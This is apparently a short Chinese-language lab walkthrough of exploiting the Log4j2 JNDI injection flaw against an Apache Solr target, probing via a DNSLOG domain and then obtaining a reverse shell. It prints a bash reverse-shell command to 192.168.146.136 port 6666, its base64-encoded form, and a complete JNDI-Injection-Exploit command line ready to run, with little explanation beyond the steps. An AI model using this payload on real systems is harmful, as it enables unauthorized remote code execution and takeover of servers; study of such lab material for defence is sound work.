代码执行漏洞-Log4j2漏洞

启动靶场环境

⾃⼰搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果..

可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,可以按照上⾯的原理 先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!

开始反弹Shell准备 JNDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!

JDNI项⽬地址

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

反弹shell

bash -i >& /dev/tcp/192.168.146.136/6666 0>&1

反弹Shell-base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx

最终Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xMzYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.146.136"

服务器监听

拿取JDK1.8并构造Payload且直接访问..可以看到⽹⻚被重定向到了我们的恶意类⽹址.

相关推荐
多多*16 小时前
微服务网关SpringCloudGateway+SaToken鉴权
linux·开发语言·redis·python·sql·log4j·bootstrap
蔡蓝2 天前
设计模式-迪米特法则
设计模式·log4j·迪米特法则
趁你还年轻_2 天前
Spring 官方推荐构造函数注入
java·spring·log4j
小鹭同学_3 天前
Java基础 Day28 完结篇
java·开发语言·log4j
还是鼠鼠6 天前
单元测试-概述&入门
java·开发语言·后端·单元测试·log4j·maven
越学不动啦6 天前
1.测试过程之需求分析和测试计划
log4j·需求分析
gb42152877 天前
单元测试报错
单元测试·log4j
蔡蓝8 天前
设计模式-单一职责原则
设计模式·log4j·单一职责原则
多多*10 天前
中间件redis 功能篇 过期淘汰策略和内存淘汰策略 力扣例题实现LRU
linux·javascript·数据库·redis·sql·log4j·bootstrap
枷锁—sha10 天前
【HW系列】—Log4j2、Fastjson漏洞流量特征
安全·web安全·log4j